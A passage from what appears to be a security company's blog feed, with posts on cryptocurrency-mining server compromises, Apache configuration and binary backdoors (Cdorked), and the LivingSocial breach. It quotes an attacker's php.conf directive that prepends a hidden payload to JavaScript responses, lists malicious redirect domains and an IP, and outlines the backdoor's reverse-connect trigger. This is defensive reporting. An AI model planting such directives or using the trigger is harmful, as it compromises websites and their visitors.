The attackers seem to leverage services like give-me-ltc.com where everyone can put resources to mine bitcoins/litecoins. When the resources are successful in solving the mathematical problems, everyone receives their share of the pie. Now, we’re not implying that give-me-ltc.com is malicious by any means, and we have no data to say otherwise. The attackers just seem to be leveraging compromised servers to join the give-me-ltc.com pool of miners.
Using Minerd
During our analysis, we found that the attackers were using a modified version of minerd for mine for Litecoins and Bitcoins. In addition to the mining, all servers we worked on also had a PHP based backdoor that gave the attackers full control of the site.
As of the time of this post, it was already being flagged by Avast as: Win32:Crypt-OSW.
What’s the Impact
Directly to bitcoin miners and users, none really. For website owners this could be a signicant issue. There is an high risk of outages and for monetary loss, and if you’re a website owner or manager, you should take this threat seriously. 
What can you do? Nothing we haven’t evangelized 100 times! Make sure you’re minimizing risk with the following 5 principles:

Update ALL software on the server
Remove all files and software not in use
Limit access to accounts and use proper roles
Strong and unique passwords are key
Institute a backup schedule off site

We don’t really know how widespread this new trend is yet, but when we started to see one server after another with the same issues, we knew something was going on. 
Our team will continue to analyze this binary and growth and we will share on follow up posts.
]]>
			http://blog.sucuri.net/2013/05/game-of-coins-the-uprise-of-bitcoin-mining.html/feed
		2
		http://blog.sucuri.net/2013/05/game-of-coins-the-uprise-of-bitcoin-mining.html
		
		
		http://feedproxy.google.com/~r/SucuriSecurity/~3/ADjZUWvyRfk/apache-web-server-attacks-continue-to-evolve.html
		http://blog.sucuri.net/2013/04/apache-web-server-attacks-continue-to-evolve.html#comments
		Mon, 29 Apr 2013 17:21:20 +0000
		Tony Perez
				
		
		
		
		

		http://blog.sucuri.net/?p=7163
		
Read More]]>
				For the past few months we have seen a gradual increase in server-level compromises. In fact, every week it seems we’re handling half a dozen or so and it continues to increase. It’s one of the reasons that I have started including this as a trend in my most recent Website Security presentations. 

Just last week we talked about some very sneaky hacks that targeted the Apache binaries directly in the place of the modules, contrary to what we had been seeing. Fortunately, the more sophisticated attack are still far and few in between leaving us to deal with rogue modules more often than not. 

The purpose of this image is to provide a logical representation of the evolution of website attacks. While websites are still the number one distribution mechanism, attackers are making a big effort to improve their attacks by going after server level applications in the place of the website itself, and it’s application (i.e., Custom ASP/PHP, WordPress, Joomla, etc..). The beauty of this is that the attacks becomes platform agnostic, in terms of the platform the end-user is utilizing.



We’ve provided guidance in the past on how to identify these things both on CentOS / RedHat and Debian distro’s. That guidance is still the same, but I do want to add some more information around what the attackers are doing to make remediation more of a challenge lately. 
Two Specific Trends
We’ll talk about two specific trends we’re seeing, in addition to the complex attacks targeting Apache binaries and modules. These are not as complex and easier to deploy, but still as dangerous and effective. They also raise concern because to accomplish either you’re looking at a user with administrative privileges, often root. 
1. Appending Malware to Outgoing Data via Configuration Files
Found by our Analyst Cosmin Strimbu and Senior Analyst Fio Cavallari
A few months back, February 19th to be exact, I wrote about some sneaky JavaScript infections in which .htaccess was being used to add, what I like to call, junk in the trunk. But what’s the obvious downside here?
Well if the server has many sites on it you have to do it on each one, how annoying is that. Well the attackers agree, so they’ve move their attack one layer down as well. No need to get fancy with Apache modules either, nah, let’s just use the configuration files and do the same thing we were doing in .htaccess. Yes, that’s sarcasm in my tone, and yes, that’s what they’re doing. 
In a specific instance this is what they did:
They modified this configuration file: /etc/httpd/conf.d/php.conf :
And they added:

<files ~ “\.js$”>

AddHandler php5-script .js

php_value auto_prepend_file /usr/local/lib/php.lib

php_flag display_errors Off

</files>

Her it’s treating all JavaSscript files as PHP and appending the payload found in this file: /usr/local/lib/php.lib to the outgoing traffic. Then it’s turning off any errors that PHP might throw to avoid detection. The next obvious question is, what’s in that php.lib. 
Here is what we found in the file: /usr/local/lib/php.lib

This is what Google was blacklisting:

From the code above you can see that the target of this attack was Internet Explorer. If the right user agent was identified then the attacker was generating a random subdomain on the statistic-online website and sending the user to the malicious payload. Unfortunately we didn’t pull the payload down in time, so hard to say exactly what it was attempting. 
2. Disabling Root Changes on Infected Files
Yes, there is a way to take away the administrators ability to modify files, any file, on your server. It’s known as making a file immutable and you accomplish this by changing the files attribution, and it’s accomplished using the chattr command. The command is very similar to the attrib command on DOS and Microsoft Windows. 
A good sign that you might be dealing with this is if you’re logged into your server as root, or with a user that has administrator permissions, and when you make a change you see:

W10: Warning: Changing a read-only file

Or if you try to save and you see:

/etc/httpd/conf.d/ssl.conf” E212: Can’t open file for writing

This is a good time to make use of the list command, but append the attr option so that it looks like this:

# lsattr filename
- in my example it’d be 
# lsattr /etc/httpd/conf.d/ssl.conf

You’re likely to see something like this:

—-ia——- /etc/httpd/conf.d/ssl.conf

The i and a attributes both mean something unique. The i set it to immutable so no-one can mess with it, but the a option makes it so that you can append to an existing file but you can’t modify existing data. You should make note however that the only user that can modify these attributes is your root user, so this is a good sign that it’s likely compromised. 
Regardless, if this is the case, you can, thankfully, remove the restriction by doing:

# chattr -ia /etc/httpd/conf.d/ssl.conf

In this case the - will remove the restriction while the + will add it. Once that is done you should see this:

# lsattr /etc/httpd/conf.d/ssl.conf

————- /etc/httpd/conf.d/ssl.conf

Now you’re back in business and removing things like this:

LoadModule uni_config_module modules/mod/mod_uni_config.so

I can’t remember the last time we found the LoadModule call being referenced in the httpd.conf, this means that they’re loading it via other configuration files so it’s a good thing to crawl through all your configuration files in /etc/httpd/conf.d as they are being loaded when Apache runs. A quick an easy way to do this:

# grep -ri “LoadModule” /etc/

I’d start in your /etc/ directory, it’s the default location for most distros, but in some instances you might need to look elsewhere, just depends on your distribution and configuration.
Don’t forget to remove the module as well, not just the LoadModule call:

# rm -rf /etc/httpd/modules/mod_uni_config.so

And reset the immutable attribute on your configuration files so that automated attacks are stopped in their tracks, but remove the append attribute. 

# chattr +i /etc/httpd/conf.d/ssl.conf

Do remember that both these changes were made as a user with administrative privileges. This means that removing or making these changes is just half the battle. If you cannot definitively identify the vector, it might be time to reimage the box or migrate to a new one. It will not do you much good if you remove it but leave everything else in place, they’ll likely continue to gain access. The frist thing I’d recommend is purging all accounts that have access. I’d then ensure that I’m not longer using passwords to authenticate and start adding a few layers of defense.
What Does This Tell Us?
We’re in for a treat, I’m perhaps most concerned about attack on the Apache binaries more so than anything as it’s so difficult to detect and fix, it does tell us that we’re in for some interesting times. We know that websites are high value targets for attackers and that they make up for 90% of the unknown malware to traditional AV’s. One very common trend in all these attacks is how they’re all being used to distributed payloads created by the BlackHole Exploit Kit. This shows a level of sophistication in that segment of attackers that we are not seeing with other groups. 
]]>
			http://blog.sucuri.net/2013/04/apache-web-server-attacks-continue-to-evolve.html/feed
		0
		http://blog.sucuri.net/2013/04/apache-web-server-attacks-continue-to-evolve.html
		
		
		http://feedproxy.google.com/~r/SucuriSecurity/~3/bFLMUNIsprk/livingsocial-hacked-more-than-50-million-accounts-compromised.html
		http://blog.sucuri.net/2013/04/livingsocial-hacked-more-than-50-million-accounts-compromised.html#comments
		Fri, 26 Apr 2013 21:36:36 +0000
		Tony Perez
				
		

		http://blog.sucuri.net/?p=7139
		
Read More]]>
				Just as we were thinking we were going to avoid any major enterprise compromises this week, LivingSocial announces that it has been compromised and some 50 million accounts have been compromised. Based on the reports, it doesn’t seem that any financial data is at risk, but things like usernames and passwords are all fair game. 

To put this into perspective, if you think back to last years major compromise, LinkedIn, that was only 6 million accounts. The data compromised here is about 8.5 times that size. 
That’s pretty freaking big.


Email to Clients

Subject: An important update on your LivingSocial.com account
LivingSocial recently experienced a cyber-attack on our computer systems that resulted in unauthorized access to some customer data from our servers. We are actively working with law enforcement to investigate this issue.

The information accessed includes names, email addresses, date of birth for some users, and encrypted passwords — technically ‘hashed’ and ‘salted’ passwords. We never store passwords in plain text.
The database that stores customer credit card information was not affected or accessed.
Although your LivingSocial password would be difficult to decode, we want to take every precaution to ensure that your account is secure, so we are expiring your old password and requesting that you create a new one.

For your security, please create a new password for your < > account by following the instructions below.
1. Visit LivingSocial.com

2. Click on the “Create a New Password” button (top right corner of the homepage)

3. Follow the steps to finish
We also encourage you, for your own personal data security, to consider changing password(s) on any other sites on which you use the same or similar password(s).
The security of your information is our priority. We always strive to ensure the security of our customer information, and we are redoubling efforts to prevent any issues in the future.
Please note that LivingSocial will never ask you directly for personal or account information in an email. We will always direct you to the LivingSocial website — and require you to login — before making any changes to your account. 
Please disregard any emails claiming to be from LivingSocial that request such information or direct you to a different website that asks for such information.
If you have additional questions about this process, the “Create a New Password” button on LivingSocial.com will direct you to a page that has instructions on creating a new password and answers to frequently asked questions.
We are sorry this incident occurred, and we look forward to continuing to introduce you to new and exciting things to do in your community.
Tim O’Shaughnessy

CEO, LivingSocial

Email to Employees

Re: Security Incident

LivingSocialites –
This e-mail is important, so please read it to the end.
We recently experienced a cyber-attack on our computer systems that resulted in unauthorized access to some customer data from our servers. We are actively working with law enforcement to investigate this issue.

The information accessed includes names, email addresses, date of birth for some users, and encrypted passwords — technically ‘hashed’ and ‘salted’ passwords. We never store passwords in plain text.

Two things you should know:
1. * The database that stores customer credit card information was not affected or accessed.

2. * The database that stores merchants’ financial and banking information was not affected or accessed.
The security of our customer and merchant information is our priority. We always strive to ensure the security of our customer information, and we are redoubling efforts to prevent any issues in the future.
To ensure our customers and merchants are fully informed and protected, we are notifying those who may have been impacted via email explaining what happened, expiring their passwords, and requesting that they create new passwords. A copy of the note is included below this email.
If you have any questions or concerns, please visit Pulse –https://pulse.livingsocial.com/intranet/Home/more_updates.html — for a list of frequently asked questions. If you have additional questions that aren’t answered in the FAQs, please submit them via email to XXX@livingsocial.com.
Because we anticipate a high call volume and may not be able to answer or return all calls in a responsible fashion, we are likely to temporarily suspend consumer phone-based servicing. We will be devoting all available resources to our web-based servicing.
I apologize for the formality of this note, which the circumstances demand. We need to do the right thing for our customers who place their trust in us, and that is why we’re taking the steps described and going above and beyond what’s required. We’ll all need to work incredibly hard over the coming days and weeks to validate that faith and trust.
– Tim

What’s this mean to you?
Well, it means that attackers, if they can manage to crack the password hashes are bound to have one of the largest username / password lists out there. What makes it worst is that they have username, email, birthday and password combinations. For any attacker looking for a specific target, or for anyone looking to perform large scale attacks like the recent Brute Force attacks against WordPress sites, this is gold mine. 
This also makes it really easy to attack things like Facebook, Twitter, MySpace, Flicker, etc.. ever hear of those companies? 
If you’re not already, here are a few things you really should be doing:

Don’t use the same password on multiple sites
Rotate usernames and emails on each site
Try platform specific emails – (e.g.., perezbox-livingsocial@gmail.com)

First, no I don’t have a LivingSocial account, at least I don’t think I do.
Second, yes it’s annoying, but what’s the real impact if you use the same information across all your social media and financial institutions? I bet those 50 million people are thinking it’s a small price to pay right now. 
Third, always employ good passwords. By good I mean: unique, random and long. At least that’s my preference. Can’t remember them? No problem, try things like password managers: 1Password and LastPass are my recommendations. 
Lastly, if you haven’t already obviously update your LivingSocial password at a minimum and I would encourage you go through all your online properties and update those accounts as well. Especially if you like to use the same information on all of them, you know who you are.
Cheers. 
]]>
			http://blog.sucuri.net/2013/04/livingsocial-hacked-more-than-50-million-accounts-compromised.html/feed
		4
		http://blog.sucuri.net/2013/04/livingsocial-hacked-more-than-50-million-accounts-compromised.html
		
		
		http://feedproxy.google.com/~r/SucuriSecurity/~3/nK9BOpbeocA/apache-binary-backdoors-on-cpanel-based-servers.html
		http://blog.sucuri.net/2013/04/apache-binary-backdoors-on-cpanel-based-servers.html#comments
		Fri, 26 Apr 2013 14:47:17 +0000
		Daniel Cid
				
		
		
		
		

		http://blog.sucuri.net/?p=7057
		
Read More]]>
				For the last few months we have been tracking server level compromises that have been utilizing malicious Apache modules (Darkleech) to inject malware into websites. Some of our previous coverage is available here and here.

However, during the last few months we started to see a change on how the injections were being done. On cPanel-based servers, instead of adding modules or modifying the Apache configuration, the attackers started to replace the Apache binary (httpd) with a malicious one. This new backdoor is very sophisticated and we worked with our friends from ESET to provide this report on what we are seeing.


Detection
In our previous posts, we recommended the utilization of tools like “rpm -Va” or “rpm -qf” or “dpkg -S” to see if the Apache modules were modified. However, those techniques won’t work against this backdoor. Since cPanel installs Apache inside /usr/local/apache and does not utilize the package managers, there is no single and simple command to detect if the Apache binary was modified.
They also keep the same timestamp on the binary, so you can’t see by the date of the file. A good and reliable way to identify the modified binary is by searching for “open_tty” on the httpd directory:

# grep -r open_tty /usr/local/apache/

If it finds open_tty in your Apache binary, it is likely compromised, since the original Apache binary does not contain a call to open_tty. Another interesting point is that if you try to just replace the bad binary with a good one, you will be denied, because they set the file attribute to immutable. So you have to run chattr -ai before replacing it:

# chattr -ai /usr/local/apache/bin/httpd

Injections
The compromised binary doesn’t change anything in the site in terms of utilization or how the sites looks, however on some random requests (once per day per IP address) instead of just displaying the content, it also adds a malicious redirect. That causes the browser to load content from what seems to be random domains:

http://893111632ce77ff9.aliz.co.kr/index.php (62.212.130.115)

http://894651446c103f0e.after1201.com (62.212.130.115)

http://328aaaf8978cc492.ajintechno.co.kr (62.212.130.115)

http://23024b407634252a.ajaxstudy.net (62.212.130.115)

http://cdb9156b281f7b01.ajuelec.co.kr (62.212.130.115)

http://894651446c103f0e.after1201.com (62.212.130.115)

..

And many others like that. So if a browser requests a javascript file, it would return a 302 (redirect) pointing to:

Location: http://dcb84fc82e1f7b01.alarm-gsm.be/index.php?j=originalfilebase64

Where “originalfilebase64″ is a base64 encoded string of the URL that was requested. That allows the attackers to return the malware along with the original content. Once the malware is loaded it will redirect the site to spammy sites (most often porn pages). At the sites we analyzed, they were being pushed to httx://amazingtubesites.org (seems offline now). On some cases we also saw the redirection going to the Blackhole Exploit kit.
Note that those URL’s change very often and the ESET team has identified more than 30,000 variations of them.
The Backdoor
Our friends from ESET (Marc-Etienne, Olivier Bilodeau and Pierre-Marc Bureau) also analyzed the binary and discovered a nasty hidden backdoor. You have to read the full article here to get more details, but here is a brief explanation quoted from there:

Linux/Cdorked.A is one of the most sophisticated Apache backdoor we have seen so far. Although we are still processing the data, our Livegrid system reports hundreds of compromised servers and thousands of potential victims. The backdoor leaves no traces on the hard drive of compromised hosts other than its modified httpd binary. All the information related to the backdoor is stored in shared memory, the configuration is pushed by the attacker through obfuscated HTTP requests that aren’t logged in normal Apache logs. This means that no command and control information is stored anywhere on the system.

..

The HTTP server is equipped with a reverse connect backdoor that can be triggered via a special HTTP GET request. It is invoked when a request to a special path is done with a query string in a particular format, containing the hostname and port to connect. The client IP of the HTTP dialog is used as a key to decrypt the query string as a 4 byte XOR key. Additionally, IP specified in X-Real-IP or X-Forwarded-For headers will override the client IP as the XOR key. This means we can craft a X-Real-IP header that will in effect be a “\x00\x00\x00\x00” key…

As you can see, the attackers don’t need any files to act as a backdoor and just use the Apache binary for it.
The Random URLS
One thing that striked us a very suspicious is that most of random domains being used as the first level redirection are coming from legitimate sites with their DNS hosted at dothost.co.kr:

ajaxstudy.net name server ns1.dothost.co.kr.

ajaxstudy.net name server ns2.dothost.co.kr.

We are still unsure if those are compromised accounts or if the attackers got some type of access to their DNS to inject random sub domains to domains hosted there. We are stil tracking how those URL’s changed, so we will have to post more details later.
Final thoughts
When attackers get full root access to the server, they can do anything they want. From modifying configurations, to injecting modules and replacing binaries. However, their tactics are changing to make it even harder for admins to detect their presence and recover from the compromise. 
We also don’t have enough information to pinpoint how those servers are initially being hacked, but we are thinking through SSHD-based brute force attacks.
We will keep monitoring these attacks and we will provide more information as we get them.
]]>
			http://blog.sucuri.net/2013/04/apache-binary-backdoors-on-cpanel-based-servers.html/feed
		0
		http://blog.sucuri.net/2013/04/apache-binary-backdoors-on-cpanel-based-servers.html